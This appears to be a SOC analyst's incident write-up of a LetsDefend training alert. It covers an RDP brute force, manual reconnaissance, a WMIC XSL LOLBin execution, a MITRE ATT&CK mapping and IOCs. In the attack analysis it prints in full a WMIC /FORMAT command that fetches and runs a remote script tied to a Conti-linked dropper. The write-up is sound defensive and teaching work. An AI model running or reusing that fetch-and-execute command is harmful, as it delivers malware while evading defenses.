An RDP brute force attack originating from 146.70.246.119 successfully compromised the local account letsdefend on host Ambrosine (172.16.17.113). Following the successful login, the attacker conducted hands-on-keyboard reconnaissance before pivoting to a WMIC LOLBin technique, using the /FORMAT flag to fetch and execute a remote XSL script. The payload URL was flagged malicious and attributed to SILENTBUILDER — a dropper and downloader associated with a subgroup of the Conti ransomware collective. No additional network connections were observed. The endpoint has been contained.
August 12, 2024 — 01:50 PM
| Field | Value |
|---|---|
| Hostname | Ambrosine |
| IP Address | 172.16.17.113 |
| Process | WMIC.exe |
| Process Path | C:\Windows\System32\Wbem\ |
| Parent Process | C:\Windows\System32\cmd.exe |
| Working Directory | C:\Users\LetsDefend\ |
| Field | Value |
|---|---|
| Attacker IP | 146.70.246.119 |
| Compromised Account | letsdefend (local) |
| Access Method | RDP brute force → successful login |
| AbuseIPDB Verdict | Confirmed malicious |
The attacker leveraged WMIC XSL Script Processing (T1220) — a well-documented LOLBin technique — to execute remote code while remaining within trusted Windows binaries. The full command observed:
wmic os get /FORMAT:"https://files-ld.s3.us-east-2.amazonaws.com/wmicscript.xsl"
The remote URL returned 2 malicious flags on VirusTotal, with analysis noting activity consistent with SILENTBUILDER — a dropper/downloader used by a Conti subgroup. The code summary described the payload as a malicious MSI masquerading as a Notepad++ installer.
Prior to WMIC execution, the attacker ran manual recon:
arp -a — ARP cache/network host enumerationnetstat -an — active connection enumerationnet localgroup administrators — local privilege enumerationwhoami — user context confirmationrunas powershell — privilege escalation attemptDevice action at time of alert was Allowed. No further outbound or inbound connections were observed from the endpoint post-execution. Verdict: True Positive — Incident confirmed. Endpoint contained.
| Technique ID | Tactic | Technique |
|---|---|---|
| T1110 | Credential Access | Brute Force |
| T1021.001 | Lateral Movement | Remote Services: Remote Desktop Protocol |
| T1059.003 | Execution | Command and Scripting Interpreter: Windows Command Shell |
| T1033 | Discovery | System Owner/User Discovery |
| T1049 | Discovery | System Network Connections Discovery |
| T1016 | Discovery | System Network Configuration Discovery |
| T1069.001 | Discovery | Permission Groups Discovery: Local Groups |
| T1220 | Defense Evasion | XSL Script Processing |
| Type | Value |
|---|---|
| Attacker IP | 146.70.246.119 |
| Victim Host IP | 172.16.17.113 |
| Malicious URL | hxxps[://]files-ld[.]s3[.]us-east-2[.]amazonaws[.]com/wmicscript[.]xsl |
| Process | WMIC.exe |
| Parent Process | cmd.exe |
| Compromised Account | letsdefend |
| Malware Family | SILENTBUILDER (Conti subgroup) |